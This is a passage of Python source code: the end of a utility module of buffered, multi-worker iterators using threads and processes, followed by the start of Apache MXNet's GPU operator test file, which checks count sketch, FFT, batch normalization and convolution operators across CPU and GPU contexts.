self.__queue.put(None) # Make sure that we remember that we are done if we are called once more...
raise StopIteration
if isinstance(next_element, tuple) and isinstance(next_element[0], Exception):
raise next_element[0].with_traceback(next_element[1])
return next_element
def __iter__(self):
if self.__is_enabled:
return self
else:
return self.__original_iterator
class MultiWorkerCallableIterator(Iterable):
"""An iterator that computes its elements in parallel workers to be ready to be consumed. The iterator should
have at least one element. The order of the callables is shuffled arbitrarily."""
def __init__(self, argument_iterator: Iterator[Iterable], worker_callable: Callable, max_queue_size: int=1, num_workers: int = 5, use_threads: bool=True):
self.__in_queue = queue.Queue() if use_threads else multiprocessing.Queue()
self.__num_elements = 0
for callable_args in argument_iterator:
self.__in_queue.put(callable_args)
self.__num_elements += 1
self.__out_queue = queue.Queue(maxsize=max_queue_size) if use_threads else multiprocessing.Queue(
maxsize=max_queue_size
)
self.__threads = [
threading.Thread(target=lambda: self.__worker(worker_callable)) if use_threads
else multiprocessing.Process(target=lambda: self.__worker(worker_callable)) for _ in range(num_workers)
]
for worker in self.__threads:
worker.start()
def __worker(self, worker_callable):
try:
while not self.__in_queue.empty():
next_element = self.__in_queue.get(block=False)
result = worker_callable(*next_element)
self.__out_queue.put(result)
except queue.Empty:
pass
except Exception as e:
_, __, tb = sys.exc_info()
self.__out_queue.put((e, tb), block=True)
def __iter__(self):
for _ in range(self.__num_elements):
next_element = self.__out_queue.get(block=True)
if isinstance(next_element, tuple) and isinstance(next_element[0], Exception):
raise next_element[0].with_traceback(next_element[1])
yield next_element
for worker in self.__threads:
worker.join()
class BufferedIterator(Iterable[T]):
"""An iterator object that computes its elements in a parallel process, ready to be consumed.
The iterator should *not* return None"""
def __init__(self, original_iterator: Iterator[T], max_queue_size: int=3, enabled: bool=True):
self.__original_iterator = original_iterator
self.__is_enabled = enabled
if enabled:
self.__buffer = multiprocessing.Queue(maxsize=max_queue_size)
self.__worker_process = multiprocessing.Process(target=lambda: self.__worker(original_iterator))
self.__worker_process.start()
def __worker(self, original_iterator: Iterator[T]) -> None:
"""Implementation of worker thread. Iterates over the original iterator, pulling results
and putting them into a buffer."""
try:
for element in original_iterator:
assert element is not None, 'By convention, iterator elements must not be None'
self.__buffer.put(element, block=True)
self.__buffer.put(None, block=True)
except Exception as e:
_, __, tb = sys.exc_info()
self.__buffer.put((e, tb), block=True)
def __iter__(self):
if not self.__is_enabled:
yield from self.__original_iterator
return
next_element = self.__buffer.get(block=True)
while next_element is not None:
if isinstance(next_element, tuple) and isinstance(next_element[0], Exception):
raise next_element[0].with_traceback(next_element[1])
yield next_element
next_element = self.__buffer.get(block=True)
self.__worker_process.join()
class DoubleBufferedIterator(Iterator[T]):
"""An iterator object that wraps double buffering around an iterable sequence.
This avoids waits in downstream applications if each step of the inner iterable can take a long while,
as the Queue used in (Single)BufferedIterator requires consumer and producer to synchronize.
Note: The inner iterable should *not* return None"""
def __init__(self, original_iterable: Iterable[T], max_queue_size_inner: int=20, max_queue_size_outer: int=5):
self.__buffer_inner = multiprocessing.Queue(maxsize=max_queue_size_inner)
self.__buffer_outer = multiprocessing.Queue(maxsize=max_queue_size_outer)
self.__worker_process_inner = multiprocessing.Process(target=lambda: self.__worker_inner(original_iterable))
self.__worker_process_outer = multiprocessing.Process(target=lambda: self.__worker_outer())
self.__worker_process_inner.start()
self.__worker_process_outer.start()
def __worker_inner(self, original_iterator: Iterable[T]) -> None:
"""Consumes elements from the original iterator, putting them into an inner buffer."""
try:
for element in original_iterator:
assert element is not None, 'By convention, iterator elements must not be None'
self.__buffer_inner.put(element, block=True)
self.__buffer_inner.put(None, block=True)
except Exception as e:
_, __, tb = sys.exc_info()
print("!!! Exception '%s' in inner worker of DoubleBufferedIterator:\n %s" % (e, "".join(
traceback.format_tb(tb)
)))
self.__buffer_inner.put((e, tb), block=True)
def __worker_outer(self) -> None:
"""Consumes elements from the inner worker and just passes them through to the outer buffer."""
try:
next_element = self.__buffer_inner.get(block=True)
while next_element is not None:
self.__buffer_outer.put(next_element, block=True)
next_element = self.__buffer_inner.get(block=True)
self.__buffer_outer.put(next_element, block=True)
except Exception as e:
_, __, tb = sys.exc_info()
print("!!! Exception '%s' in outer worker of DoubleBufferedIterator:\n %s" % (
e, "".join(traceback.format_tb(tb))
))
self.__buffer_outer.put((e, tb), block=True)
def __iter__(self):
return self
def __next__(self):
next_element = self.__buffer_outer.get(block=True)
if isinstance(next_element, tuple) and isinstance(next_element[0], Exception):
raise next_element[0].with_traceback(next_element[1])
elif next_element is None:
self.__worker_process_inner.join()
self.__worker_process_outer.join()
raise StopIteration
return next_element
|
test_operator_gpu.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import sys
import os
import time
import multiprocessing as mp
import unittest
import mxnet as mx
import numpy as np
import unittest
from nose.tools import assert_raises
from mxnet.test_utils import check_consistency, set_default_context, assert_almost_equal
from mxnet.base import MXNetError
from mxnet import autograd
from numpy.testing import assert_allclose
curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))
sys.path.insert(0, os.path.join(curr_path, '../unittest'))
from common import setup_module, with_seed, teardown, assert_raises_cudnn_disabled
from test_operator import *
from test_optimizer import *
from test_random import *
from test_exc_handling import *
#from test_rnn import *
from test_sparse_ndarray import *
from test_sparse_operator import *
from test_ndarray import *
set_default_context(mx.gpu(0))
del test_support_vector_machine_l1_svm # noqa
del test_support_vector_machine_l2_svm # noqa
def check_countsketch(in_dim,out_dim,n):
data = mx.sym.Variable("data")
h = mx.sym.Variable("h")
s = mx.sym.Variable("s")
sym = mx.sym.contrib.count_sketch(data=data, h=h, s=s, name='countsketch',out_dim = out_dim)
shape = [(n,in_dim), (1,in_dim),(1,in_dim)] #shape of input x, hash h and hash s
arr = [mx.nd.empty(shape[i]) for i in range(3)]
arr_grad = [mx.nd.empty(shape[i]) for i in range(3)]
x = np.random.uniform(-10, 10, shape[0])
arr[0][:] = x #input x
h = np.random.randint(0, out_dim, shape[1])
arr[1][:] = h #hash h
s = np.random.randint(0, 2, shape[2])*2-np.ones(shape[2])
arr[2][:] = s #hash s
locations = {"data": x, "h": h, "s": s}
a = np.zeros((n,out_dim))
temp = np.multiply(x, s)
for num_sample in np.arange(0,n):
for idx in np.arange(0,in_dim):
a[num_sample][h[0][idx]] += temp[num_sample][idx]
check_symbolic_forward(sym, locations, [a], rtol=1e-3, atol=1e-5, ctx=mx.gpu(0))
out_grad = mx.nd.empty((n,out_dim))
out_grad[:] = np.random.normal(-3, 3, (n,out_dim))
a = np.zeros((n,in_dim))
for j in np.arange(0,n):
for i in np.arange(0,in_dim):
a[j,i] = out_grad.asnumpy()[j, h[0,i]] * s[0,i]
check_symbolic_backward(sym, locations, [out_grad], [a], rtol=1e-3, atol=1e-5, ctx=mx.gpu(0))
@with_seed()
def test_countsketch():
minindim = 40
maxindim = 100
minoutdim = 5
maxoutdim = 30
maxn = 200
in_dim = np.random.randint(minindim, maxindim)
out_dim = np.random.randint(minoutdim, maxoutdim)
n = np.random.randint(1, maxn)
check_countsketch(in_dim, out_dim, n)
def check_ifft(shape):
shape_old = shape
if len(shape) == 2:
if shape[1]%2 != 0:
lst = list(shape)
lst[1] = lst[1]*2
shape = tuple(lst)
shape_old = shape
shape = (shape[0],shape[1]*2)
if len(shape) == 4:
if shape[3]%2 != 0:
lst = list(shape)
lst[3] = lst[3]*2
shape = tuple(lst)
shape_old = shape
shape = (shape[0],shape[1],shape[2],shape[3]*2)
sym = mx.sym.contrib.ifft(name='ifft', compute_size = 128)
init = [np.random.normal(size=shape, scale=1.0)]
arr_grad = [mx.nd.empty(shape)]
ctx_list = [{'ctx': mx.gpu(0),'ifft_data': shape, 'type_dict': {'ifft_data': np.float32}}]
exe_list = [sym.simple_bind(args_grad=arr_grad,**ctx) for ctx in ctx_list]
for exe in exe_list:
for arr, iarr in zip(exe.arg_arrays, init):
arr[:] = iarr.astype(arr.dtype)
# forward
for exe in exe_list:
exe.forward(is_train= True)
out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
if len(shape) == 2:
init_complex = np.zeros(shape_old,dtype = np.complex64)
for i in range(0,shape_old[1]):
init_complex.real[:,i] = init[0][:,2*i]
init_complex.imag[:,i] = init[0][:,2*i+1]
a = np.fft.ifft(init_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, out1[0]/shape_old[1],rtol=1e-3, atol=1e-5)
if len(shape) == 4:
init_complex = np.zeros(shape_old,dtype = np.complex64)
for i in range(0,shape_old[3]):
init_complex.real[:,:,:,i] = init[0][:,:,:,2*i]
init_complex.imag[:,:,:,i] = init[0][:,:,:,2*i+1]
a = np.fft.ifft(init_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, out1[0]/shape_old[3],rtol=1e-3, atol=1e-5)
# backward
if len(shape) == 2:
out_grad = mx.nd.empty(shape_old)
out_grad[:] = np.random.normal(-3, 3, shape_old)
for exe in exe_list:
exe.backward([out_grad])
temp = exe.grad_arrays[0].asnumpy()
temp = np.zeros(shape_old)
for i in range(shape_old[1]):
temp[:,i] = exe.grad_arrays[0].asnumpy()[:,2*i]
a = np.fft.fft(out_grad.asnumpy(), n=None, axis=-1, norm=None)
assert_almost_equal(a.real, temp, rtol=1e-3, atol=1e-5)
if len(shape) == 4:
out_grad = mx.nd.empty(shape_old)
out_grad[:] = np.random.normal(-3, 3, shape_old)
for exe in exe_list:
exe.backward([out_grad])
temp = exe.grad_arrays[0].asnumpy()
temp = np.zeros(shape_old)
for i in range(shape_old[3]):
temp[:,:,:,i] = exe.grad_arrays[0].asnumpy()[:,:,:,2*i]
a = np.fft.fft(out_grad.asnumpy(), n=None, axis=-1, norm=None)
assert_almost_equal(a.real, temp, rtol=1e-3, atol=1e-5)
@with_seed()
def test_ifft():
nrepeat = 2
maxdim = 10
for repeat in range(nrepeat):
for order in [2,4]:
shape = tuple(np.random.randint(1, maxdim, size=order))
check_ifft(shape)
def check_fft(shape):
sym = mx.sym.contrib.fft(name='fft', compute_size = 128)
if len(shape) == 2:
if shape[1]%2 != 0:
lst = list(shape)
lst[1] = lst[1]*2
shape = tuple(lst)
shape_old = shape
if len(shape) == 4:
if shape[3]%2 != 0:
lst = list(shape)
lst[3] = lst[3]*2
shape = tuple(lst)
shape_old = shape
init = [np.random.normal(size=shape, scale=1.0)]
arr_grad = [mx.nd.empty(shape)]
ctx_list = [{'ctx': mx.gpu(0),'fft_data': shape, 'type_dict': {'fft_data': np.float32}}]
exe_list = [sym.simple_bind(args_grad=arr_grad,**ctx) for ctx in ctx_list]
for exe in exe_list:
for arr, iarr in zip(exe.arg_arrays, init):
arr[:] = iarr.astype(arr.dtype)
# forward
for exe in exe_list:
exe.forward(is_train=True)
out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
out = np.fft.fft(init, n=None, axis=-1, norm=None)
if len(shape) == 2:
out = np.reshape(out,(out.shape[1],out.shape[2]))
out2 = np.append(out.real, out.imag, axis = 1)
a = np.zeros(out1[0].shape)
p = 0
for i in range(out2.shape[1]//2):
a[:,p] = out2[:,i]
a[:,p+1] = out2[:,i+out2.shape[1]//2]
p = p+2
if len(shape) == 4:
out = np.reshape(out,(out.shape[1],out.shape[2],out.shape[3],out.shape[4]))
out2 = np.append(out.real, out.imag, axis = 1)
a = np.zeros(out1[0].shape)
for i in range(out1[0].shape[0]):
for j in range(out1[0].shape[1]):
p = 0
for k in range(out2.shape[3]):
a[i,j,:,p] = out2[i,j,:,k]
a[i,j,:,p+1] = out2[i,j+out1[0].shape[1],:,k]
p = p+2
assert_almost_equal(a, out1[0],rtol=1e-3, atol=1e-5)
# backward
if len(shape) == 2:
out_grad = mx.nd.empty((shape[0],2*shape[1]))
out_grad[:] = np.random.normal(-3, 3, (shape[0],2*shape[1]))
# out_grad_to_complex
out_grad_complex = np.zeros(shape,dtype = np.complex64)
for i in range(0,shape[1]):
out_grad_complex.real[:,i] = out_grad.asnumpy()[:,2*i]
out_grad_complex.imag[:,i] = out_grad.asnumpy()[:,2*i+1]
for exe in exe_list:
exe.backward([out_grad])
a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, exe.grad_arrays[0].asnumpy()/shape[1],rtol=1e-3, atol=1e-5)
if len(shape) == 4:
out_grad = mx.nd.empty(out1[0].shape)
out_grad[:] = np.random.normal(-3, 3, out1[0].shape)
# out_grad_to_complex
out_grad_complex = np.zeros(shape,dtype = np.complex64)
for i in range(0,shape[3]):
out_grad_complex.real[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i]
out_grad_complex.imag[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i+1]
for exe in exe_list:
exe.backward([out_grad])
a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, exe.grad_arrays[0].asnumpy()/shape[3],rtol=1e-3, atol=1e-5)
@with_seed()
def test_fft():
nrepeat = 2
maxdim = 10
for repeat in range(nrepeat):
for order in [2,4]:
shape = tuple(np.random.randint(1, maxdim, size=order))
check_fft(shape)
@with_seed()
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/10087")
def test_batchnorm_with_type():
ctx_list_v1_2D = [
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
]
ctx_list_v2_2D = [
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float64}},
]
ctx_list_v2_1D = [
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float64}},
]
ctx_list_v2_3D = [
{'ctx': mx.cpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float64}}
]
# V1, 2D
sym = mx.sym.BatchNorm_v1(name='norm', fix_gamma=False)
check_consistency(sym, ctx_list_v1_2D)
sym = mx.sym.BatchNorm_v1(name='norm', fix_gamma=True)
check_consistency(sym, ctx_list_v1_2D)
# V2, 2D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
# V2, 1D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
#
# # V2, 3D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_3D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_3D)
@with_seed()
def test_batchnorm_versions():
def test_batchnorm_versions_helper(batchnorm_op_list, data, fix_gamma, use_global_stats):
ctx_list = []
sym_list = []
# BatchNormV1 cpu
if 'batchnorm_v1_cpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm_v1(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNormV1 gpu (organic)
if 'batchnorm_v1_gpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm_v1(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNorm cpu
if 'batchnorm_cpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNorm gpu (organic)
if 'batchnorm_gpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm', cudnn_off=True))
# BatchNorm gpu cudnn (if cudnn is enabled)
if 'batchnorm_cudnn' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm', cudnn_off=False))
check_consistency(sym_list, ctx_list)
def test_1d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 20)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu', 'batchnorm_cudnn'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
def test_2d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 10, 10)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_v1_cpu', 'batchnorm_v1_gpu',
'batchnorm_cpu',
'batchnorm_gpu', 'batchnorm_cudnn'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
def test_3d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 3, 5, 5)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
test_1d_batchnorm(True, False)
test_1d_batchnorm(False, False)
test_1d_batchnorm(False, True)
test_1d_batchnorm(True, True)
test_2d_batchnorm(True, False)
test_2d_batchnorm(False, False)
test_2d_batchnorm(False, True)
test_2d_batchnorm(True, True)
test_3d_batchnorm(True, False)
test_3d_batchnorm(False, False)
test_3d_batchnorm(False, True)
test_3d_batchnorm(True, True)
@with_seed(1234)
@assert_raises_cudnn_disabled()
def test_convolution_with_type():
sym1 = mx.sym.Convolution(num_filter=3, kernel=(3,3), name='conv')
data = mx.sym.Variable('conv_data')
w = mx.sym.Variable('conv_weight')
b = mx.sym.Variable('conv_bias')
w = mx.sym.transpose(w, axes=(0,2,3,1))
sym2 = mx.sym.transpose(data, axes=(0,2,3,1))
sym2 = mx.sym.Convolution(sym2, w, b, layout='NHWC', num_filter=3, kernel=(3,3))
sym2 = mx.sym.transpose(sym2, axes=(0,3,1,2), name='conv')
sym = [sym1, sym1, sym1, sym1, sym1, sym2, sym2]
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
# NHWC
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
'type_dict': {'conv_data': np.float32, 'conv_weight': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
'type_dict': {'conv_data': np.float16, 'conv_weight': np.float16}}
]
# wider tolerance needed for true-fp16 NCHW test above
tol = {np.dtype(np.float16): 0.5,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
# test ability to turn off training on bias
check_consistency(sym, ctx_list, grad_req={'conv_data': 'write', 'conv_weight': 'write', 'conv_bias': 'null'}, tol=tol)
# Apply N symbols against each of M contexts, checking that all NxM combinations match.
def check_consistency_NxM(sym_list, ctx_list):
# e.g. if sym_list=[sym1, sym2] and ctx_list=[ctx1, ctx2, ctx3], then resulting lists are:
# sym_list=[sym1, sym1, sym1, sym2, sym2, sym2] and ctx_list=[ctx1, ctx2, ctx3, ctx1, ctx2, ctx3]
check_consistency(np.repeat(sym_list, len(ctx_list)), ctx_list * len(sym_list), scale=0.5)
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/10141")
@with_seed()
def test_convolution_options():
# 1D convolution
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(1,), pad=(0,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,), pad=(0,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 2D convolution
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 3D convolution
ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# This test is designed to expose an issue with cudnn v7.1.4 algo find() when invoked with large c.
# Algos returned by find() can fail to run with grad_req='add' (wgrad kernel beta parameter == 1.0f).
@with_seed()
def test_convolution_large_c():
problematic_c = 64 * 1024
# The convolution accumulates many values, so set large tolerances.
tol = {np.dtype(np.float32): 1,
np.dtype(np.float64): 1}
def test_1D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, width), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, width), 'type_dict': {'conv_data': np.float64}}]
sym = mx.sym.Convolution(layout='NCW', num_filter=8, kernel=(2,), name='conv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
def test_2D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, 2, width), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, 2, width), 'type_dict': {'conv_data': np.float64}}]
sym = mx.sym.Convolution(layout='NCHW', num_filter=4, kernel=(2,2), name='conv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
# Run with different data tensor shapes to run cudnnFind() multiple times.
# First, populate algo and op caches with models that always use cudnnFind() (req == 'write').
# Then run models that must avoid cached cudnnFind() results in some cases (req == 'add').
widths = [4, 16, 64]
for req in ['write', 'add']:
for width in widths:
test_1D_with_width(width, req)
test_2D_with_width(width, req)
# This test is designed to expose an issue with cudnn v7.1.4 algo find() when invoked with large c.
# Algos returned by find() can fail to run with grad_req='add' (wgrad kernel beta parameter == 1.0f).
@with_seed()
def test_deconvolution_large_c():
problematic_c = 64 * 1024
# The deconvolution accumulates many values, so set large tolerances.
tol = {np.dtype(np.float32): 1,
np.dtype(np.float64): 1}
